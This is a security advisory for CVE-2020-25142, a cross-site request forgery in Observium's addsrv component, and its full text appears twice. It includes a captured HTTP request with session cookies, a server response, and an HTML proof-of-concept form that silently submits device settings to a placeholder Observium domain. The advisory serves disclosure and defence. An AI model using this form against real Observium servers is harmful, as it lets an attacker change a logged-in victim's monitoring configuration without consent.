ahpaleus/CVE-2020-25142.txt

## CVE-2020-25142.txt
CVE-2020-25142
------------------------------------------
Cross Site Request Forgery in addsrv

------------------------------------------
[Description]
Preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session. The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request. The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs a greater risk that the URL will be exposed to an attacker, thus compromising the secret token. Requiring the user to reauthenticate, or prove they are a user (e.g. via CAPTCHA) can also protect against CSRF.

------------------------------------------

[Additional Information]


Example request in application without anti-CSRF token:

POST /addsrv HTTP/1.1
Host: localhost
Connection: close
Content-Length: 66
Cache-Control: max-age=0
Origin: http://burpsuite
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://burpsuite/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: OBSID=devr29ck03vi89iodg94c5kjsuu1e6jj; observium_screen_ratio=0.8999999761581421; observium_screen_resolution=3840x2160; ckey=fcef773f63df1c5c3f308eef424f21d9; dkey=1931752580e9bcc6d3afbc530b733f66

addsrv=yes&device=2&descr=test123&ip=test2&params=test3&Submit=Add


Partial server response

HTTP/1.1 200 OK
Date: Wed, 19 Aug 2020 10:53:39 GMT
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.2k-fips PHP/7.0.30
Strict-Transport-Security: max-age=63072000; includeSubdomains;
X-Frame-Options: DENY
X-Powered-By: PHP/7.0.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: OBSID=devr29ck03vi89iodg94c5kjsuu1e6jj; expires=Wed, 19-Aug-2020 11:23:40 GMT; Max-Age=1800; path=/; secure;HttpOnly;Secure
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
Content-Security-Policy: sandbox allow-forms allow-scripts allow-same-origin;
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 960503

<!DOCTYPE html>
<html lang="en">
(…)
</button>
      <div>Device Settings Saved</div>
    </div>


Proof of concept exploit:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://observiumDomain.com/addsrv" method="POST">
      <input type="hidden" name="addsrv" value="yes" />
      <input type="hidden" name="device" value="2" />
      <input type="hidden" name="descr" value="test123" />
      <input type="hidden" name="ip" value="test2" />
      <input type="hidden" name="params" value="test3" />
      <input type="hidden" name="Submit" value="Add" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  // End -->
  </script>
  <script type="text/javascript">
  <!-- Begin
$("[data-toggle='confirm']").popConfirm();
  // End -->
  </script>
  <!-- SCRIPT END -->
</body>
</html>


------------------------------------------

[VulnerabilityType Other]
Cross Site Request Forgery

------------------------------------------

[Vendor of Product]
https://www.observium.org/

------------------------------------------

[Affected Product Code Base]
Professional, Enterprise & Community 20.8.10631

------------------------------------------

[Affected Component]
addsrv

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Reference]
https://github.com/OWASP/ASVS/blob/master/4.0/en/0x12-V4-Access-Control.md
https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html


------------------------------------------

[Discoverer]
Maciej Domański

------------------------------------------


Maciej Domański / AFINE.com team
	CVE-2020-25142
	------------------------------------------
	Cross Site Request Forgery in addsrv

	------------------------------------------
	[Description]
	Preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session. The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request. The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs a greater risk that the URL will be exposed to an attacker, thus compromising the secret token. Requiring the user to reauthenticate, or prove they are a user (e.g. via CAPTCHA) can also protect against CSRF.

	------------------------------------------

	[Additional Information]


	Example request in application without anti-CSRF token:

	POST /addsrv HTTP/1.1
	Host: localhost
	Connection: close
	Content-Length: 66
	Cache-Control: max-age=0
	Origin: http://burpsuite
	Upgrade-Insecure-Requests: 1
	DNT: 1
	Content-Type: application/x-www-form-urlencoded
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
	Sec-Fetch-Site: cross-site
	Sec-Fetch-Mode: navigate
	Sec-Fetch-User: ?1
	Sec-Fetch-Dest: document
	Referer: http://burpsuite/
	Accept-Encoding: gzip, deflate
	Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
	Cookie: OBSID=devr29ck03vi89iodg94c5kjsuu1e6jj; observium_screen_ratio=0.8999999761581421; observium_screen_resolution=3840x2160; ckey=fcef773f63df1c5c3f308eef424f21d9; dkey=1931752580e9bcc6d3afbc530b733f66

	addsrv=yes&device=2&descr=test123&ip=test2&params=test3&Submit=Add




	Partial server response

	HTTP/1.1 200 OK
	Date: Wed, 19 Aug 2020 10:53:39 GMT
	Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.2k-fips PHP/7.0.30
	Strict-Transport-Security: max-age=63072000; includeSubdomains;
	X-Frame-Options: DENY
	X-Powered-By: PHP/7.0.30
	Expires: Thu, 19 Nov 1981 08:52:00 GMT
	Cache-Control: no-store, no-cache, must-revalidate
	Pragma: no-cache
	Set-Cookie: OBSID=devr29ck03vi89iodg94c5kjsuu1e6jj; expires=Wed, 19-Aug-2020 11:23:40 GMT; Max-Age=1800; path=/; secure;HttpOnly;Secure
	X-XSS-Protection: 1; mode=block
	X-Permitted-Cross-Domain-Policies: none
	Content-Security-Policy: sandbox allow-forms allow-scripts allow-same-origin;
	X-Content-Type-Options: nosniff
	Connection: close
	Content-Type: text/html; charset=UTF-8
	Content-Length: 960503

	<!DOCTYPE html>
	<html lang="en">
	(…)
	</button>
	<div>Device Settings Saved</div>
	</div>


	Proof of concept exploit:

	<html>
	<body>
	<script>history.pushState('', '', '/')</script>
	<form action="https://observiumDomain.com/addsrv" method="POST">
	<input type="hidden" name="addsrv" value="yes" />
	<input type="hidden" name="device" value="2" />
	<input type="hidden" name="descr" value="test123" />
	<input type="hidden" name="ip" value="test2" />
	<input type="hidden" name="params" value="test3" />
	<input type="hidden" name="Submit" value="Add" />
	<input type="submit" value="Submit request" />
	</form>
	</body>
	</html>

	// End -->
	</script>
	<script type="text/javascript">
	<!-- Begin
	$("[data-toggle='confirm']").popConfirm();
	// End -->
	</script>
	<!-- SCRIPT END -->
	</body>
	</html>



	------------------------------------------

	[VulnerabilityType Other]
	Cross Site Request Forgery

	------------------------------------------

	[Vendor of Product]
	https://www.observium.org/

	------------------------------------------

	[Affected Product Code Base]
	Professional, Enterprise & Community 20.8.10631

	------------------------------------------

	[Affected Component]
	addsrv

	------------------------------------------

	[Attack Type]
	Remote

	------------------------------------------

	[Reference]
	https://github.com/OWASP/ASVS/blob/master/4.0/en/0x12-V4-Access-Control.md
	https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)
	https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html


	------------------------------------------

	[Discoverer]
	Maciej Domański

	------------------------------------------


	Maciej Domański / AFINE.com team